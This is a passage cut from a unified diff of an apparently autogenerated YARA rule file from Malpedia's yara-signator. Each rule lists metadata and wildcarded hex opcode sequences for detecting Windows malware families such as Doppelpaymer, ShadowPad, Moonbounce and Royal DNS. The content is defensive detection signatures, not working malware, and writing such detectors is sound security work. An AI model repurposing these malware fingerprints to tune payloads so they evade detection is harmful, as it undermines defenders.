+		$sequence_9 = { eb46 8b01 52 8d55d4 c745fc00000000 52 ff5014 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 10500096
 }
-rule MALPEDIA_Win_Royal_Dns_Auto : FILE
+rule MALPEDIA_Win_Mortis_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e4eee0e-991f-5e5c-8e46-34ff6666420e"
+		id = "f1dc50d3-c8e9-5fa8-9af5-7aac8f083303"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.royal_dns_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortis"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mortis_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "ebf3458b22350e610da4d705384f784d27dfca7bf952035b68054c9acd2a2a7b"
+		logic_hash = "0e2f339d3dda0007a7d364688897ee3fa718ccca078261699c7cc12487f6f0da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145862,32 +145748,32 @@ rule MALPEDIA_Win_Royal_Dns_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 56 83c30d 8d85d8fcffff 53 50 }
-		$sequence_1 = { 83c404 83bdb1f7ffff64 8b8dbbf7ffff 8d70f1 7559 83f964 7554 }
-		$sequence_2 = { f3a5 e8???????? 83c40c b908000000 }
-		$sequence_3 = { be???????? 8d7dd8 f3a5 83c40c 6a01 a4 e8???????? }
-		$sequence_4 = { 0fb65c0602 c1ea07 03db 0bd3 83e21f 0fb69248132500 885104 }
-		$sequence_5 = { 8d85c0feffff 6a00 50 c785b0feffffa9ea6152 c785b4feffffe7a5db56 }
-		$sequence_6 = { 7416 83fe04 7511 8b95bff7ffff 89957cf1ffff e9???????? 85c9 }
-		$sequence_7 = { 6888130000 ff15???????? 4e 75f2 68e4000000 8d85c0f5ffff 6a00 }
-		$sequence_8 = { 393d???????? 7c11 6860ea0000 ffd6 c705????????00000000 68b80b0000 }
-		$sequence_9 = { 772a ff248590162400 6a01 6a03 }
+		$sequence_0 = { 6bcf38 030c95201f4400 f6412d01 7428 e8???????? c70016000000 e8???????? }
+		$sequence_1 = { 68???????? 51 50 51 ffb54cfdffff 8d4d98 e8???????? }
+		$sequence_2 = { 8d1476 c1e204 8d0476 57 03d7 8d0cc7 e8???????? }
+		$sequence_3 = { 8d8d40feffff 6a00 034804 33c0 394138 0f94c0 8d048502000000 }
+		$sequence_4 = { c645fc01 8d8da0fdffff 6a07 0f57c0 c785b0fdffff00000000 68???????? 0f1185a0fdffff }
+		$sequence_5 = { f20f591485d08c4300 660f5834c5e0944300 660f54c5 f20f5ce8 f20f58fa f20f10d8 f20f59c1 }
+		$sequence_6 = { 8b07 6a01 68???????? 51 50 51 ffb54cfdffff }
+		$sequence_7 = { c60000 c645fc04 8b8d3cfdffff 83f910 722f 8b9528fdffff 41 }
+		$sequence_8 = { 7544 ba???????? b9???????? e8???????? 8bf0 ff15???????? }
+		$sequence_9 = { 68???????? 0f1185e8fdffff c785fcfdffff00000000 e8???????? c645fc05 8d8d00feffff 6a0a }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 577536
 }
-rule MALPEDIA_Win_Mosquito_Auto : FILE
+rule MALPEDIA_Win_Tildeb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "34ccfc9c-1c07-526c-894b-5084961ae1c7"
+		id = "c974fa6c-0d31-59bc-a143-d1c23bc433da"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mosquito_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tildeb_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "4f8e972330c002e4476c43f04fdf320df70c4455b51cf01f5f99efe08713790b"
+		logic_hash = "7842b223356a837886d4f126b2b0f2ea5dcea94b3925e6e82a6b6f41a78e7627"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145901,41 +145787,32 @@ rule MALPEDIA_Win_Mosquito_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d8 1bc0 83e0b4 83c04c }
-		$sequence_1 = { 52 50 6a00 6801c1fd7d }
-		$sequence_2 = { 8bfc f3a5 ff942464020000 81c450020000 }
-		$sequence_3 = { 894b02 8bcf 8b17 ff5208 }
-		$sequence_4 = { 8b750c 57 894dfc 8d5e06 53 e8???????? 8bf8 }
-		$sequence_5 = { ff5010 85c0 7436 837dfc00 7409 }
-		$sequence_6 = { f3a5 ff942460020000 81c450020000 85c0 }
-		$sequence_7 = { e8???????? 6a20 8bf0 e8???????? 8bc8 }
-		$sequence_8 = { 51 8b55fc 52 8b45f8 50 ff15???????? 8b4dfc }
-		$sequence_9 = { 6801c1fd7d e8???????? 8bd8 eb02 }
-		$sequence_10 = { e8???????? 83c40c e8???????? 6a20 }
-		$sequence_11 = { 0000 006301 1000 7500 }
-		$sequence_12 = { ff15???????? 6a00 56 ff15???????? 8903 }
-		$sequence_13 = { 0000 006500 676c 0010 }
-		$sequence_14 = { 0000 00645657 8b7dc2 0400 }
-		$sequence_15 = { 0000 0032 08804d086440 5e }
-		$sequence_16 = { 0000 0001 1001 c550f0 8b8078005900 }
-		$sequence_17 = { 0000 0018 a0???????? 57 }
-		$sequence_18 = { 0000 00748078 3001 40 }
+		$sequence_0 = { 8bbc24e0000000 03fb 03ef 8b3d???????? }
+		$sequence_1 = { ff15???????? e9???????? 6810270000 8b0d???????? 51 ff15???????? 85c0 }
+		$sequence_2 = { 83c8ff 5e 81c494010000 c3 b80a000000 5e 81c494010000 }
+		$sequence_3 = { 8d4c2420 e8???????? 50 ff15???????? 8bf8 83c9ff 33c0 }
+		$sequence_4 = { 50 51 ff15???????? 3d040000c0 7516 8b16 }
+		$sequence_5 = { b9???????? e8???????? 6a00 6a04 8d85e0f9ffff 50 }
+		$sequence_6 = { 8d85e4f9ffff 50 6800040000 ff15???????? 8d8de0f5ffff 51 6a00 }
+		$sequence_7 = { 33dd 8bac24d0000000 899c24ec000000 8b9c24e4000000 33dd 8bac24b8000000 33dd }
+		$sequence_8 = { 89442460 8b442454 8d4c2458 33f0 51 89742468 e8???????? }
+		$sequence_9 = { 85c0 7507 c605????????01 68???????? 68???????? 8b3d???????? ffd7 }
 
 	condition:
-		7 of them and filesize < 1015808
+		7 of them and filesize < 8532488
 }
-rule MALPEDIA_Win_Rad_Auto : FILE
+rule MALPEDIA_Win_Doppelpaymer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8a099829-2dbe-5073-9ece-c0e3e763fe4a"
+		id = "1dc537b4-6f02-5ffb-95a3-e1931065b1d5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rad"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rad_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doppelpaymer_auto.yar#L1-L187"
 		license_url = "N/A"
-		logic_hash = "2d90510a72fef277223444468a95d2c25d3c61f771625c4fd1893b29c13678f2"
+		logic_hash = "afd64f2ddb5bd37f521cb40f0013348f346b9ab89a5e6cb99d5de3a1977e77f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145949,32 +145826,40 @@ rule MALPEDIA_Win_Rad_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8d9cfdffff c645fc1a ff15???????? c645fc19 }
-		$sequence_1 = { 51 ff15???????? 83c404 33c0 8945c8 }
-		$sequence_2 = { 5b c3 83fefe 760b }
-		$sequence_3 = { 8d8f10030000 c684240c06000016 ff15???????? 8d4c2458 c684240806000015 ffd3 39742450 }
-		$sequence_4 = { 89742410 c684240001000006 85f6 7447 8bce ff15???????? c706???????? }
-		$sequence_5 = { e8???????? 8d4c2434 68???????? 51 e8???????? 8b35???????? 6a14 }
-		$sequence_6 = { ff25???????? 8db514faffff e9???????? 8db530faffff e9???????? 8d8d4cfaffff }
-		$sequence_7 = { 8b75e0 8bd6 83fe06 7205 }
-		$sequence_8 = { 8975b0 eb03 897db0 8b55b0 8955ac c645fc04 }
-		$sequence_9 = { 59 8be5 5d c20400 8d4df0 c645fc00 ff15???????? }
+		$sequence_0 = { 7523 80790264 751d 80790561 }
+		$sequence_1 = { 751d 80790561 7517 80790361 7511 80790474 }
+		$sequence_2 = { e8???????? 8b08 e8???????? 3db6389096 }
+		$sequence_3 = { 80790361 7511 80790474 750b 80790173 7505 80392e }
+		$sequence_4 = { baffffff7f 43 e8???????? 3bd8 }
+		$sequence_5 = { 83ec28 6800002002 6a00 6a01 }
+		$sequence_6 = { 8d8c2478010000 e8???????? 8d8c246c010000 e8???????? 8d8c24dc010000 e8???????? 8d8c24cc010000 }
+		$sequence_7 = { e8???????? 85c0 740d 6a00 ff742440 ffd0 85c0 }
+		$sequence_8 = { c20800 897de0 897de4 897de8 8d4900 }
+		$sequence_9 = { 895ddc 0f84f0000000 e9???????? b801000000 b925155e0b }
+		$sequence_10 = { c20800 8b31 8955f8 8955fc }
+		$sequence_11 = { 8b4d0c 8b5508 83f800 8945f4 894df0 8955ec 7528 }
+		$sequence_12 = { 894de4 8955e0 897ddc 8975d8 }
+		$sequence_13 = { 8945e8 eb0c a1???????? ffd0 8945e4 ebc9 8b45e8 }
+		$sequence_14 = { 8945e4 ebe3 b8c6ea1451 2b45ec 8b4dd8 81c1ffff0000 }
+		$sequence_15 = { 8b7e38 897dc8 8955cc 893424 c744240400000000 c744240858000000 }
+		$sequence_16 = { 8b55d8 8bb2a0000000 8b7de4 01f7 89fb 83c304 8b55e4 }
+		$sequence_17 = { 8b8578ffffff b909fcb97e 2b4df0 8b55a4 39ca }
 
 	condition:
-		7 of them and filesize < 207872
+		7 of them and filesize < 7266304
 }
-rule MALPEDIA_Win_Pvzout_Auto : FILE
+rule MALPEDIA_Win_Yorekey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a2ef17b-53cd-553c-9129-4e623095fe72"
+		id = "53555fbf-037b-5e64-8224-50e96dcbd224"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pvzout_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yorekey_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "a07bc946194cd01a9387c49797743aad8628a2824c8c9c6f1536148459ed0ba4"
+		logic_hash = "41e7314d91a8ca800c9d1b91b639e00add0929573052dd3660fca999dcefb1ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145988,32 +145873,37 @@ rule MALPEDIA_Win_Pvzout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { d4a1 0e 75a8 43 }
-		$sequence_1 = { bf95f6810e 75a8 43 1dea50873a d4a1 0e }
-		$sequence_2 = { 43 1dea50873a d4a1 0e 75a8 43 1dea50873a }
-		$sequence_3 = { 1dea50873a d4a1 0e 75a8 43 1dea50873a }
-		$sequence_4 = { 3089f33d80f3 48 e21c 3e3f 19e9 }
-		$sequence_5 = { 18830d88a01c 51 ab 25b53ae778 f3bd95ab4ed8 }
-		$sequence_6 = { 1dea50873a d4a1 0e 75a8 }
-		$sequence_7 = { 19e9 73f8 dca10ebd24e8 252b0026cb 9e }
-		$sequence_8 = { d4a1 0e 75a8 43 2f 3089f33d80f3 }
-		$sequence_9 = { 5a bf95f6810e 75a8 43 }
+		$sequence_0 = { 750a 85c0 7506 ff15???????? }
+		$sequence_1 = { 4881ec80000000 488b05???????? 4833c4 488945f0 488d55a0 }
+		$sequence_2 = { a1???????? 8bd0 83f910 7305 ba???????? }
+		$sequence_3 = { 3da1000000 761b 3da3000000 7714 }
+		$sequence_4 = { 488bc7 c6041800 ffc5 49ffc6 }
+		$sequence_5 = { 488b05???????? 4833c4 4889442458 8b01 488bf9 }
+		$sequence_6 = { 88541c2f 4881fb00010000 72dd 8b5704 8b0f 4c8d442430 4c8bce }
+		$sequence_7 = { 8bd9 7418 488d0df7f50000 e8???????? 85c0 7408 }
+		$sequence_8 = { 50 56 8d8c240c080000 51 52 ffd7 }
+		$sequence_9 = { 8955f0 0fbe13 52 894dec 8b0d???????? 8945f4 8d45e4 }
+		$sequence_10 = { 8d4598 b919000000 be???????? 8d7d98 50 f3a5 ff15???????? }
+		$sequence_11 = { 68ff000000 e8???????? 59 59 8b7508 8d34f5d8194100 }
+		$sequence_12 = { 0fbe84c140e14000 6a07 c1f804 59 }
+		$sequence_13 = { cc 488d0de61f0100 e8???????? cc 85f6 }
+		$sequence_14 = { 488b13 498b0f 488d0549470000 4889442450 488b85f0040000 4c8d442430 4889442460 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 274432
 }
-rule MALPEDIA_Win_Darkmegi_Auto : FILE
+rule MALPEDIA_Win_Quarterrig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e022205f-532d-5998-8adc-7461a155f6b2"
+		id = "773e603c-b2a3-5ce5-ad18-62d70b454a9c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkmegi_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quarterrig_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "186562bccca029dc0a54ad2573032322c99b928af1a23f4cf752d54c2cfd880f"
+		logic_hash = "e5d3fc199bcc485e4ab028e477fcfeb78c0e1cd4e9776332bb130fba34692b6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146027,32 +145917,32 @@ rule MALPEDIA_Win_Darkmegi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 6804010000 50 56 ff15???????? 8d8c2488090000 }
-		$sequence_1 = { 3bd9 7cd2 8806 5f 5e 5d 5b }
-		$sequence_2 = { 57 8b7c2414 57 e8???????? 8b542414 83c404 8d4c2408 }
-		$sequence_3 = { 8d0440 8b8c8420010000 c6040a00 8b442410 }
-		$sequence_4 = { f2ae 8bcd 4f c1e902 f3a5 8b842464020000 }
-		$sequence_5 = { 85c0 0f849f000000 8dbc246c020000 83c9ff 33c0 }
-		$sequence_6 = { 8d04c0 8b0c8d40a7b402 f644810401 8d0481 7403 8b00 }
-		$sequence_7 = { 5d 5b c3 8b542414 5f 5e 5d }
-		$sequence_8 = { 8bac24a8020000 53 66ab aa }
-		$sequence_9 = { 3bf8 0f8d43010000 8d4c2414 8d942498030000 51 }
+		$sequence_0 = { 488d95f0010000 488d4c2460 e8???????? 410fbaec07 4489642434 488d542460 48837c247810 }
+		$sequence_1 = { 7506 443a5802 7420 498bc1 492bc2 4903c0 663b10 }
+		$sequence_2 = { 482bd7 4a0fbeb43850140600 8d4e01 4863c1 483bc2 0f8fe4010000 83f904 }
+		$sequence_3 = { 4c89442418 4c894c2420 4883ec28 b95772865c e8???????? 4c8bf8 b95772865c }
+		$sequence_4 = { 84c0 0f85a6000000 488d5770 488d8d10010000 e8???????? 84c0 0f8588000000 }
+		$sequence_5 = { 80e107 c0e103 498bc5 48d3e8 43300408 49ffc0 4983f803 }
+		$sequence_6 = { c3 488d0d7ad90500 e8???????? 833d????????ff 75d2 66c705????????1301 }
+		$sequence_7 = { 498d8fc0000000 498bd1 e8???????? 90 488b55d7 4883fa10 720c }
+		$sequence_8 = { 80e107 c0e103 48b8fff3a94f9f372b79 48d3e8 42300402 48ffc2 4883fa07 }
+		$sequence_9 = { 418ac9 80e107 c0e103 49b81bf1eb35955fe34f 49d3e8 45300401 49ffc1 }
 
 	condition:
-		7 of them and filesize < 90304
+		7 of them and filesize < 971776
 }
-rule MALPEDIA_Win_Sanny_Auto : FILE
+rule MALPEDIA_Win_Vsingle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b4b3143-6e56-57d2-a40c-de1821af2738"
+		id = "d7b6b6db-e313-5b0b-a645-6bf26597d2b3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sanny_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vsingle_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "e2fbc4a585eb4f31f4417da33af8b6c1fed46bb262bdcc20859cec67dc3394ca"
+		logic_hash = "f69fc53fa8d26d98505b2a81c4ca94e19258f9d652d84433b0b518828946acca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146066,32 +145956,38 @@ rule MALPEDIA_Win_Sanny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 56 e8???????? 8b4c2434 8b542430 51 52 }
-		$sequence_1 = { 8b4c240c 6a05 51 8bce }
-		$sequence_2 = { 8d4c241c 51 8d542444 6a00 8d4c2434 52 51 }
-		$sequence_3 = { 894614 83c002 50 e8???????? 8b4e14 83c404 41 }
-		$sequence_4 = { eb63 3c02 755f 8b861cc70000 85c0 7455 8b542408 }
-		$sequence_5 = { 8b542410 52 ffd5 8d442414 43 50 53 }
-		$sequence_6 = { 8b54244c 8d442454 8d4c240c 50 51 8d442428 52 }
-		$sequence_7 = { 81ec08040000 8d442400 56 8bb42414040000 50 8b842420040000 8d54240c }
-		$sequence_8 = { 53 57 8d3c85c4714100 bb00100000 7520 53 }
-		$sequence_9 = { 8d3449 2bd1 8d34b530634100 832600 83c60c 4a 75f7 }
+		$sequence_0 = { 668985ccb6ffff 6800200000 6a00 8d8dceb6ffff 51 e8???????? }
+		$sequence_1 = { 50 6800010000 8b4508 50 }
+		$sequence_2 = { 50 51 b8b0490000 e8???????? }
+		$sequence_3 = { 83c404 50 8d4dd0 51 e8???????? 83c40c }
+		$sequence_4 = { 035508 b801000000 d1e0 8a4dff 880c02 ba04000000 }
+		$sequence_5 = { 035508 be01000000 d1e6 8a0408 }
+		$sequence_6 = { 50 0fb78d10efffff 51 0fb79516efffff 52 0fb78512efffff 50 }
+		$sequence_7 = { 668985d4f6ffff 68fe070000 6a00 8d8dd6f6ffff }
+		$sequence_8 = { 81c29733eaa8 81f2e97da1b5 81ea52e5b08e 81c2f77c29e2 81ea4b516cc2 89042a 5a }
+		$sequence_9 = { 5f 51 57 51 b9cd968197 }
+		$sequence_10 = { 51 b9b187ff90 81e95e49f864 81c17c65b866 81c10f9cc186 }
+		$sequence_11 = { 81c2b953352c 81c26fe1dd9a 81eaf2033eb3 81f2866440c5 81f237c658eb 81c2a804b1a7 }
+		$sequence_12 = { 5b 53 bb8fbc7c14 81c30cf1050f e9???????? 5e }
+		$sequence_13 = { 7505 e9???????? 50 b8e64d1443 81e8dc1e5dbe eb0a }
+		$sequence_14 = { 89042e 5e 56 be76e3d36a 81ee46419e0d }
+		$sequence_15 = { 81f19d49dcd4 81e9c159bc74 890429 59 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 940032
 }
-rule MALPEDIA_Win_Ice_Cache_Auto : FILE
+rule MALPEDIA_Win_Moonbounce_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2bb6d9ef-4306-54f0-bb68-5fe8abb99071"
+		id = "300bd16a-9128-501e-b6a9-aa7b7927b326"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_cache"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ice_cache_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moonbounce_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "257ed7cb63e1c0858485a90386f353a13f9ab5e026a2c8483909741253dfdd4d"
+		logic_hash = "07326c1e5d89427ce612fcc5180ad0922ace80e6e89b51e53f272b71223e0de4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146105,32 +146001,32 @@ rule MALPEDIA_Win_Ice_Cache_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4156 4157 4883ec30 488b19 498be8 4c8bf2 }
-		$sequence_1 = { 488bd9 4885c0 7479 488d0d0a520200 483bc1 746d 488b83e0000000 }
-		$sequence_2 = { 33d2 498bce e8???????? 90 488d8c24080f0000 e8???????? e9???????? }
-		$sequence_3 = { 0f114a10 4c894110 48c741180f000000 448801 44894220 4883c420 }
-		$sequence_4 = { 48f7d0 493bc6 0f8694000000 48897c2430 4a8d3c01 4d85f6 746d }
-		$sequence_5 = { 488b542448 488d4c2448 e8???????? e8???????? e8???????? 0fb6c3 488b4c2468 }
-		$sequence_6 = { 744c 0fb618 48ffc0 48894710 83fbff 7440 }
-		$sequence_7 = { 74e8 488bd8 4889442470 493bdf 7410 488d5320 498bce }
-		$sequence_8 = { 7536 4c8bc7 488d1502700300 660f1f440000 0fb702 663901 }
-		$sequence_9 = { 418bf0 4c8d0d0f870100 8bda 4c8d05fe860100 }
+		$sequence_0 = { 8b4dd4 0500100000 83c418 8901 }
+		$sequence_1 = { b9???????? 2bc8 51 50 8b4508 83c014 50 }
+		$sequence_2 = { 8945d8 53 8d45dc 50 ff15???????? 8d45d0 8945f8 }
+		$sequence_3 = { 034004 83780400 7798 8d8680000000 83780400 }
+		$sequence_4 = { 57 57 83c60c 56 ff15???????? 5f }
+		$sequence_5 = { ff7508 ff15???????? 6a40 6800300000 8d45fc 50 }
+		$sequence_6 = { 84c0 7518 8b4310 56 }
+		$sequence_7 = { 8365f400 8d5008 895508 8b5004 03cb 83c2f8 894df0 }
+		$sequence_8 = { 8b45f0 0fb70448 8b4f1c 8d0c81 8b4508 8b1c01 03d8 }
+		$sequence_9 = { 8d450c 50 ff750c 33db ff15???????? }
 
 	condition:
-		7 of them and filesize < 801792
+		7 of them and filesize < 70912
 }
-rule MALPEDIA_Win_Unidentified_069_Auto : FILE
+rule MALPEDIA_Win_Radrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "afe1465e-cfb7-567e-8fc3-f22e1927c9fa"
+		id = "8cc3544a-ed32-5550-b925-dec2c9f06198"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_069_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.radrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "83336718c29f0a03822d261021a531779ab99e146839ff186b37823c6377f602"
+		logic_hash = "fb8c6f115f4d653cbab2ab642c199fa84b318ba0571f54841296153652a76219"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146144,32 +146040,32 @@ rule MALPEDIA_Win_Unidentified_069_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4564 e8???????? 84c0 747b 807d6802 7558 }
-		$sequence_1 = { 3975fc 0f824dffffff 5f 5b 8b450c 5e c9 }
-		$sequence_2 = { ff15???????? 8b7d08 8b37 e8???????? 83f8ff 0f84a8010000 8b0d???????? }
-		$sequence_3 = { 8b75f4 f6450804 741a 85f6 7616 8b7d0c 8d4477fe }
-		$sequence_4 = { 7fae ff36 885dff ff15???????? 59 8a45ff 5f }
-		$sequence_5 = { 8bda d1eb 23df 8b1c9da81d4000 81e3ffffff01 03c0 }
-		$sequence_6 = { c20400 8b462c 85c0 7638 83f820 7411 57 }
-		$sequence_7 = { 7505 895dd8 eb11 0fb7c0 03c7 50 83c8ff }
-		$sequence_8 = { e8???????? 8bf8 85ff 0f8e97000000 8bca e8???????? }
-		$sequence_9 = { ff15???????? 85c0 7419 6a00 68???????? 6a05 ba???????? }
+		$sequence_0 = { c645fc06 8d9578ffffff 52 83ec28 8bc4 89a520ffffff 8d4dcc }
+		$sequence_1 = { 8b55d8 894a54 837df010 7404 0cff eb7b 8b45d8 }
+		$sequence_2 = { 8d8db4c3ffff e8???????? e9???????? 83bd54ffffff46 0f8570110000 6a01 8d953cc3ffff }
+		$sequence_3 = { e8???????? c3 8d8d8ccdffff e8???????? c3 8d8dac95ffff e8???????? }
+		$sequence_4 = { e8???????? c3 8d4d80 e8???????? c3 8d8d18fdffff e8???????? }
+		$sequence_5 = { e8???????? c745c000000000 eb09 8b45c0 83c001 8945c0 8b4dc0 }
+		$sequence_6 = { c745fc00000000 8b45c0 50 8b4dc8 e8???????? c745fcffffffff 8d4dcc }
+		$sequence_7 = { c68522ffffff00 c68524ffffff00 c645fc07 8b550c 52 8d8decfeffff e8???????? }
+		$sequence_8 = { e8???????? 83c410 8845fc 8b4dfc 81e1ff000000 85c9 7411 }
+		$sequence_9 = { e8???????? c645fc08 8b8d6cfbffff 83c108 e8???????? c645fc04 8d8ddefdffff }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 2080768
 }
-rule MALPEDIA_Win_Onhat_Auto : FILE
+rule MALPEDIA_Win_Shadowpad_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c03e9aab-ceb3-5936-af60-a6f47c0b4822"
+		id = "0c1faf29-7964-56d7-af15-c1e6eca3ddc5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.onhat_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shadowpad_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "2683ee8ac88dff088a6e9025d3b65f7d07e7b813a5d7aa89913a323bd3055d20"
+		logic_hash = "f49d5d94105b284c3bf5a2bc14ecce3430da1255366e6df534c457baba4feead"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -146183,32 +146079,32 @@ rule MALPEDIA_Win_Onhat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c684248c00000025 c684248d00000064 c684248e00000000 ffd6 83c40c }
-		$sequence_1 = { c644242956 885c242a c644242b50 c644242c4f c644242d52 }
-		$sequence_2 = { c644242761 c644242874 88442429 c644241c4e c644241d6f c644241e48 }
-		$sequence_3 = { 33d2 8a542432 8acf 50 51 }
-		$sequence_4 = { 66ab aa 55 8d442458 6a64 50 51 }
-		$sequence_5 = { 89442424 0f8404020000 8b4c2414 50 }
-		$sequence_6 = { 33c0 5e 83c414 c3 8b4c240c 51 }
-		$sequence_7 = { 55 8d442458 6a64 50 51 e8???????? }
-		$sequence_8 = { 6689542412 e8???????? 83f8ff 7507 33c0 5e 83c410 }
